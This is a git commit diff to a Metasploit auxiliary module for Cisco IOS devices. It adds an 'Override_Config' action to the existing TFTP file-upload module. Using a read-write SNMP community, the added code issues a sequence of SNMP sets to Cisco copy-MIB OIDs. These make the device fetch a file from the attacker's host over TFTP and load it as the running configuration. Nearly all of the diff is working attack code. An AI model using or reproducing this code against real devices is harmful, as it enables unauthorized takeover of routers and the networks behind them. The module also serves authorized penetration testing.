modify cisco_upload_file to include actions

default action is Upload_File, which was the original function
the new action Override_Config will override the running config
master
ct5595 2019-04-08 16:12:21 -04:00
parent f34314547b
commit 403cf825a8
1 changed files with 72 additions and 25 deletions

View File

@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
'Name' => 'Cisco IOS SNMP File Upload (TFTP)',
'Description' => %q{
This module will copy file to a Cisco IOS device using SNMP and TFTP.
The action override_config will override the running config of the Cisco device.
The action Override_Config will override the running config of the Cisco device.
A read-write SNMP community is required. The SNMP community scanner module can
assist in identifying a read-write community. The target must
be able to connect back to the Metasploit system and the use of
@ -24,7 +24,37 @@ class MetasploitModule < Msf::Auxiliary
'pello <fropert[at]packetfault.org>',
'ct5595'
],
'License' => MSF_LICENSE
'License' => MSF_LICENSE,
'Actions' =>
[
[
'Upload_File',
{
'Description' => 'Upload the file',
'ciscoFlashCopyCommand' => '1.3.6.1.4.1.9.9.10.1.2.1.1.2.',
'ciscoFlashCopyProtocol' => '1.3.6.1.4.1.9.9.10.1.2.1.1.3.',
'ciscoFlashCopyServerAddress' => '1.3.6.1.4.1.9.9.10.1.2.1.1.4.',
'ciscoFlashCopySourceName' => '1.3.6.1.4.1.9.9.10.1.2.1.1.5.',
'ciscoFlashCopyDestinationName' => '1.3.6.1.4.1.9.9.10.1.2.1.1.6.',
'ciscoFlashCopyEntryStatus' => '1.3.6.1.4.1.9.9.10.1.2.1.1.11.'
}
],
[
'Override_Config',
{
'Description' => 'Override the running config',
'ciscoFlashCopyEntryStatus' => '1.3.6.1.4.1.9.9.10.1.2.1.1.11.',
'ciscoFlashCopyCommand' => '1.3.6.1.4.1.9.9.10.1.2.1.1.2.',
'ccCopyProtocol' => '1.3.6.1.4.1.9.9.96.1.1.1.1.2.',
'ccCopySourceFileType' => '1.3.6.1.4.1.9.9.96.1.1.1.1.3.',
'ccCopyDestFileType' => '1.3.6.1.4.1.9.9.96.1.1.1.1.4.',
'ccCopyServerAddress' => '1.3.6.1.4.1.9.9.96.1.1.1.1.5.',
'ccCopyFileName' => '1.3.6.1.4.1.9.9.96.1.1.1.1.6.',
'ccCopyEntryRowStatus' => '1.3.6.1.4.1.9.9.96.1.1.1.1.14.'
}
]
],
'DefaultAction' => 'Upload_File'
)
register_options([
OptPath.new('SOURCE', [true, "The filename to upload" ]),
@ -80,44 +110,61 @@ class MetasploitModule < Msf::Auxiliary
begin
lhost = datastore['LHOST'] || Rex::Socket.source_address(ip)
ciscoFlashCopyCommand = "1.3.6.1.4.1.9.9.10.1.2.1.1.2."
ciscoFlashCopyProtocol = "1.3.6.1.4.1.9.9.10.1.2.1.1.3."
ciscoFlashCopyServerAddress = "1.3.6.1.4.1.9.9.10.1.2.1.1.4."
ciscoFlashCopySourceName = "1.3.6.1.4.1.9.9.10.1.2.1.1.5."
ciscoFlashCopyDestinationName = "1.3.6.1.4.1.9.9.10.1.2.1.1.6."
ciscoFlashCopyEntryStatus = "1.3.6.1.4.1.9.9.10.1.2.1.1.11."
session = rand(255) + 1
snmp = connect_snmp
varbind = SNMP::VarBind.new("#{ciscoFlashCopyEntryStatus}#{session}" , SNMP::Integer.new(6))
varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyEntryStatus']}#{session}" , SNMP::Integer.new(6))
value = snmp.set(varbind)
varbind = SNMP::VarBind.new("#{ciscoFlashCopyEntryStatus}#{session}" , SNMP::Integer.new(5))
varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyEntryStatus']}#{session}" , SNMP::Integer.new(5))
value = snmp.set(varbind)
varbind = SNMP::VarBind.new("#{ciscoFlashCopyCommand}#{session}" , SNMP::Integer.new(2))
varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyCommand']}#{session}" , SNMP::Integer.new(2))
value = snmp.set(varbind)
# If the above line didn't throw an error, the host is alive and the community is valid
print_status("Copying file #{@filename} to #{ip}...")
varbind = SNMP::VarBind.new("#{ciscoFlashCopyProtocol}#{session}" , SNMP::Integer.new(1))
if(action.name == 'Upload_File')
varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyProtocol']}#{session}" , SNMP::Integer.new(1))
value = snmp.set(varbind)
varbind = SNMP::VarBind.new("#{ciscoFlashCopyServerAddress}#{session}", SNMP::IpAddress.new(lhost))
varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyServerAddress']}#{session}", SNMP::IpAddress.new(lhost))
value = snmp.set(varbind)
varbind = SNMP::VarBind.new("#{ciscoFlashCopySourceName}#{session}", SNMP::OctetString.new(@filename))
varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopySourceName']}#{session}", SNMP::OctetString.new(@filename))
value = snmp.set(varbind)
varbind = SNMP::VarBind.new("#{ciscoFlashCopyDestinationName}#{session}", SNMP::OctetString.new(@filename))
varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyDestinationName']}#{session}", SNMP::OctetString.new(@filename))
value = snmp.set(varbind)
varbind = SNMP::VarBind.new("#{ciscoFlashCopyEntryStatus}#{session}" , SNMP::Integer.new(1))
varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyEntryStatus']}#{session}" , SNMP::Integer.new(1))
value = snmp.set(varbind)
elsif(action.name == 'Override_Config')
varbind = SNMP::VarBind.new("#{action.opts['ccCopyProtocol']}#{session}" , SNMP::Integer.new(1))
value = snmp.set(varbind)
varbind = SNMP::VarBind.new("#{action.opts['ccCopySourceFileType']}#{session}" , SNMP::Integer.new(1))
value = snmp.set(varbind)
varbind = SNMP::VarBind.new("#{action.opts['ccCopyDestFileType']}#{session}" , SNMP::Integer.new(4))
value = snmp.set(varbind)
varbind = SNMP::VarBind.new("#{action.opts['ccCopyServerAddress']}#{session}", SNMP::IpAddress.new(lhost))
value = snmp.set(varbind)
varbind = SNMP::VarBind.new("#{action.opts['ccCopyFileName']}#{session}", SNMP::OctetString.new(@filename))
value = snmp.set(varbind)
varbind = SNMP::VarBind.new("#{action.opts['ccCopyEntryRowStatus']}#{session}" , SNMP::Integer.new(1))
value = snmp.set(varbind)
end
# No need to make noise about timeouts